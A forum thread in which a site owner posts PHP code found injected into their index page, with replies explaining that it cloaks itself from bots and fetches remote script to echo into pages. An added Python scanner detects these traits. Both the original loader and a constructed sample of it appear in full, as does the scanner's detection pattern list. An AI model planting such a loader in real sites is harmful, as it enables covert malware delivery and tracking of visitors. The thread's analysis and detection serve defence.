
what does this code do?


bigBrumm


someone broke into my site and added the following to my index page:

 

error_reporting(0); ini_set('display_errors',0); $wp_amcjz4740 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_amcjz4740) && !preg_match ('/bot/i', $wp_amcjz4740))){
$wp_amcjz094740="http://"."template"."body".".com/body"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_amcjz4740);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_amcjz094740);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_4740amcjz = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_4740amcjz,1,3) === 'scr' ){ echo $wp_4740amcjz; }
 

 

I've removed it and changed the FTP access.

But I was wondering what it actually did? I can understand bits, but cannot really put everything together.


Looks to me like it looks to make sure that the request was from a browser, not from a bot, and if it is, adds malicious code to your page from a remote server. By not serving the malicious code to bots, it delays Google warning users that your site is hosting malware.

$wp_amcjz094740="http://"."template"."body".".com/body"."/

It looks to me like it is set to go to http[This is here to break the link]://template.body.com/body/ but I may be missing something and I'm not surfing over there to figure it out.

It retrieves stuff from that server, after telling it which site it's running from and some information about the user, then will probably output whatever stuff it got back.

It means they can put on your site anything from ads to malware to malicious JavaScript to basically anything they want. Only thing it won't do is execute arbitrary PHP code.
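An added example, not part of the original thread: a small heuristic scanner for finding other copies of this kind of injection across a site's PHP files. It flags the combination of traits described in the replies above (silenced errors, a User-Agent check that excludes bots, a URL assembled from string fragments, visitor details sent out, and the fetched response echoed into the page). The function names, the threshold and both sample files are constructed for illustration, and `example.invalid` is a placeholder host.

```python
import re

# Traits of the injected loader discussed in this thread. Each is weak on its
# own; several together in one file is what makes the file worth a manual look.
TRAITS = {
    "error_suppression": re.compile(r"error_reporting\s*\(\s*0\s*\)|display_errors['\"]\s*,\s*0", re.I),
    "ua_read": re.compile(r"\$_SERVER\s*\[\s*['\"]HTTP_USER_AGENT['\"]\s*\]"),
    "bot_exclusion": re.compile(r"!\s*preg_match\s*\(\s*['\"]/[^'\"]*bot[^'\"]*/i?['\"]", re.I),
    "split_url": re.compile(r"['\"]https?://['\"]\s*\.\s*['\"]"),
    "visitor_leak": re.compile(r"\$_SERVER\s*\[\s*['\"]REMOTE_ADDR['\"]\s*\]"),
    "remote_fetch": re.compile(r"\bcurl_exec\s*\(|\bfile_get_contents\s*\(\s*\$", re.I),
}
FETCH_ASSIGN = re.compile(r"(\$\w+)\s*=\s*@?\s*curl_exec\s*\(", re.I)
ECHO_VAR = re.compile(r"\becho\s+(\$\w+)\s*;")

def scan_php(source):
    """Return the names of the traits found in one PHP source string."""
    hits = sorted(name for name, rx in TRAITS.items() if rx.search(source))
    fetched, echoed = set(FETCH_ASSIGN.findall(source)), set(ECHO_VAR.findall(source))
    if fetched & echoed:  # a remote response is written straight into the page
        hits.append("echo_of_fetched_body")
    return hits

def is_suspicious(source, threshold=4):
    return len(scan_php(source)) >= threshold

# Constructed sample modelled on the snippet in the first post (placeholder host).
INJECTED = r'''<?php
error_reporting(0);
$ua = @$_SERVER['HTTP_USER_AGENT'];
if (preg_match('/Gecko|MSIE/i', $ua) && !preg_match('/bot/i', $ua)) {
  $u = "http://"."loader".".example.invalid/?ip=".$_SERVER['REMOTE_ADDR']."&ua=".urlencode($ua);
  $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $u);
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $body = curl_exec($ch); curl_close($ch);
}
if (substr($body,1,3) === 'scr') { echo $body; }
'''

# Constructed benign file: an ordinary API call that should not be flagged.
BENIGN = r'''<?php
$ch = curl_init("https://api.example.invalid/status");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$status = json_decode(curl_exec($ch), true);
echo htmlspecialchars($status['message']);
'''
```

To sweep a whole document root, call `scan_php()` on the contents of every `.php` file and review anything `is_suspicious()` flags by hand; a hit is a lead, not proof.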
